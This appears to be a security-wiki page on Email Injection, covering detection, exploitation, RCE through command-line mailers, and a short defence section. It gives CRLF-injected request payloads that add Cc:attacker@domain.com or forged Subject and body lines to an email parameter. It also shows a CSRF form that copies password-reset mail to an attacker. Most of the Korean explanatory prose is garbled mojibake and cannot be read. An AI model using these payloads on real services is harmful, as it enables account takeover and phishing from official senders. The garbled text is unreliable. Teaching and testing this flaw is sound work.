Email Injection

🔍 Introduction

Email Injection์€ Application์—์„œ ์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ ๋ฐ›์€ ์ž…๋ ฅ ๊ฐ’์ด Email์„ ์ฒ˜๋ฆฌํ•˜๋Š”๋ฐ ์‚ฌ์šฉ๋˜๊ณ  ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ๋ฏธํกํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ ์•…์˜์ ์ธ ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ๋ฉ”์ผ ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

{
    "email":"sender@domain.com%0ACc:attacker@domain.com"
}

๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•œ๋‹ค๋ฉด ๊ณต์‹ ๊ณ„์ • ์‚ฌ์นญ์ด๋‚˜ ํ”ผ์‹ฑ ๋“ฑ์— ํ™œ์šฉ๋  ์ˆ˜ ์žˆ๊ณ , ์—ฐ๊ด€๋œ ์‹œ์Šคํ…œ์— ๋”ฐ๋ผ์„œ ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์— ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

🗡 Offensive techniques

Detect

Every point where an email is sent as a result of a web request, such as invitations and notifications, can be affected by Email Injection.

POST /invite HTTP/1.1

email=hahwul@gmail.com

email ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ†ตํ•ด ๋ฐ›์€ ๊ฐ’์ด SMTP ๋“ฑ ๋ฉ”์ผ ์ „์†ก ์‹œ์Šคํ…œ์„ ํ†ตํ•ด ์ „์†ก๋  ๋•Œ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ์—†๋‹ค๋ฉด CRLF(๊ฐœํ–‰๋ฌธ์ž)๋“ฑ์„ ์ด์šฉํ•˜์—ฌ Email์˜ ์†ก/์ˆ˜์‹ ์ธ, ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=hahwul@gmail.com%0ASubject:Fake%20Subject

Exploitation

Stealing sensitive information

CSRF ๋“ฑ์˜ ์ทจ์•ฝ์ ๊ณผ ์กฐํ•ฉ๋˜๋ฉด ํŒจ์Šค์›Œ๋“œ ์žฌ ์„ค์ • ์‹œ ๋ฐœ์ƒํ•˜๋Š” ๋ฉ”์ผ์ด๋‚˜ 2FA ์ธ์ฆ ๊ฐ’ ๋“ฑ ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=victim@domain.com%0ACc:attacker@domain.com

๋ฉ”์ผ์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ์š”์ฒญ ์‹œ Email Injectionํ•˜์—ฌ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ์—๋„ Cc๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ์ „๋‹ฌ๋  ์ˆ˜ ์žˆ๋„๋ก ๊ณต๊ฒฉ์ฝ”๋“œ๋ฅผ ๊ตฌ์„ฑํ•œ๋‹ค๋ฉด ํ”ผํ•ด์ž๊ฐ€ CSRF ์ฝ”๋“œ ์ ‘๊ทผ ์‹œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์žฌ์ƒ์„ฑ ๋งํฌ ๋“ฑ์„ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ๋กœ๋„ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ์–ด ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์˜ ์ด์Šˆ์™€ ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<form action="https://weakness-service/findPassword" method="post">
    <input type=text name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>

Crafting phishing mail by manipulating Subject and Body

Email Injection์ด ๊ฐ€๋Šฅํ•œ ๋ฉ”์ผ์ด noreply@blahblah ๋“ฑ ๊ณต์‹ ๊ณ„์ •์œผ๋กœ ์ „์†ก๋˜๋Š” ๊ฒฝ์šฐ Subject, Body ๋“ฑ์„ ์กฐ์ž‘ํ•˜์—ฌ ๊ณต์‹ ๊ณ„์ •์—์„œ์˜ ํ”ผ์‹ฑ ๋ฉ”์ผ์„ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /notify HTTP/1.1

email=victim@domain.com%0ASubject:Important%20Security%20Alerts%0A%0AFake%20Message!

RCE

Mail ์ „์†ก์„ ์œ„ํ•ด์„œ Command-line์œผ๋กœ ๋‹ค๋ฅธ Mail Application์„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๋Œ€ํ‘œ์ ์œผ๋กœ PHP Cli์˜ mail() ํ•จ์ˆ˜๋„ ๋น„์Šทํ•˜์ฃ .

์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ Command Injection๊ณผ ๋™์ผํ•˜๊ฒŒ ํ•ด๋‹น ๊ณผ์ •์—์„œ ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•œ ์ฒ˜๋ฆฌ๊ฐ€ ๋ฏธํกํ•˜๋‹ค๋ฉด ์ด๋ฅผ ํ†ตํ•ด ์ตœ์ข…์ ์œผ๋กœ RCE๊นŒ์ง€ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

🛡 Defensive techniques

์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ Email ์ „์†ก์— ์‚ฌ์šฉ๋˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐ›์•„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์ง€์ •๋œ ํฌ๋งท์˜ ๋ฐ์ดํ„ฐ ์ด์™ธ์—๋Š” ์ฒ˜๋ฆฌํ•˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. ํŠนํžˆ ๊ฐœํ–‰๋ฌธ์ž์˜ ๊ฒฝ์šฐ ์—ฌ๋Ÿฌ๊ฐ€์ง€ Exploit ํฌ์ธํŠธ๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ผญ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

📌 References

  • https://en.wikipedia.org/wiki/Email_injection
  • https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
  • https://www.hahwul.com/cullinan/crlf-injection/#-defensive-techniques